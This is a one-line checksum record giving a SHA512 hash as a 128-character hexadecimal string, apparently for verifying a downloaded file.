SHA512 5dd64fff7909744b3408a2567c046eb2b5b7474f8549296941a51f018ed442fc5bf2024e108f315df8a7c2d3d481f45c8581feedcf7748394b99e3c80e35e724